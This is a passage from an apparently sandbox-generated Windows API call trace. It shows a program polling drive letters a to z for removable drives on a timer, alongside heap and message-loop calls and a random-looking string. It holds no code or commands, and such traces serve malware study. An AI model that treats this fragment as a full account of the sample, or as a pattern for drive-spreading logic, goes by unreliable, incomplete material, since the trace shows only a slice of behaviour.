returned 0 [0214.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0214.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.955] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0214.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.955] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0214.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0214.955] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0214.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0214.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0214.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0214.955] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0214.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0214.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0214.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0214.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0214.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0214.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.956] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.956] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.956] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.956] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.956] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.957] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.957] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.957] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.957] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.957] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.957] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.958] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.958] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.958] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.958] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.958] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.958] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.959] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.959] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.959] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.959] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.959] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.959] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.960] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.960] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.960] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.960] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0214.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0214.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0214.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0214.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.961] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0214.961] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0214.961] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0214.961] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0214.961] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0214.961] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0214.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0214.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e00 [0214.962] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.962] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e00 | out: hHeap=0x12c0000) returned 1 [0214.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0214.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0214.962] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0214.962] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0214.962] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0214.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0214.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0214.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0214.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.962] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0214.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.963] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0214.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0214.963] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0214.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0214.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.963] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0214.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0214.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0214.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.963] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0214.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0214.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0214.963] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.963] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.963] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.964] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.964] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.964] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.964] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.964] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.964] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.965] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.965] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.965] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.965] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.965] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.965] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.966] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.966] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.966] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.967] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.967] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.967] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.967] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.967] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.008] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.008] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.009] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.009] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.009] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.009] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.009] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0215.009] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.009] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.009] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.009] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.009] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.009] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.009] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0215.009] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.010] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0215.010] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0215.010] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0215.010] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0215.010] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0215.010] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0215.010] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0215.010] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.010] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0215.010] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.010] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0215.010] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325ea0 [0215.010] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.010] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0215.010] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.010] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.011] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325ea0 | out: hHeap=0x12c0000) returned 1 [0215.011] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0215.011] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0215.011] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0215.011] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.011] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0215.011] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.011] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0215.011] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.011] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.011] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0215.011] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0215.011] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0215.011] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0215.011] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0215.011] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0215.011] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.011] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0215.011] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0215.011] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0215.011] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0215.011] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0215.011] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0215.012] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0215.012] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0215.012] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0215.012] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0215.012] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.012] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0215.012] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0215.012] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.012] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0215.012] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.012] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0215.012] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0215.012] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0215.012] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0215.012] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0215.012] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0215.012] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0215.012] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0215.012] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0215.013] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0215.013] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0215.013] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0215.013] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0215.013] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0215.013] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0215.014] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0215.014] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0215.014] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0215.014] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0215.014] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0215.014] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0215.015] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0215.015] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0215.015] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0215.015] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0215.015] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0215.016] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0215.016] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0215.016] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0215.016] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0215.016] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0215.016] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0215.017] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0215.017] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0215.017] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0215.017] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0215.017] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0215.017] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0215.017] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0215.017] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0215.017] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0215.017] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0215.017] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0215.017] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0215.017] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0215.017] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0215.017] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0215.017] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0215.017] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0215.017] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f80 [0215.017] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0215.018] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 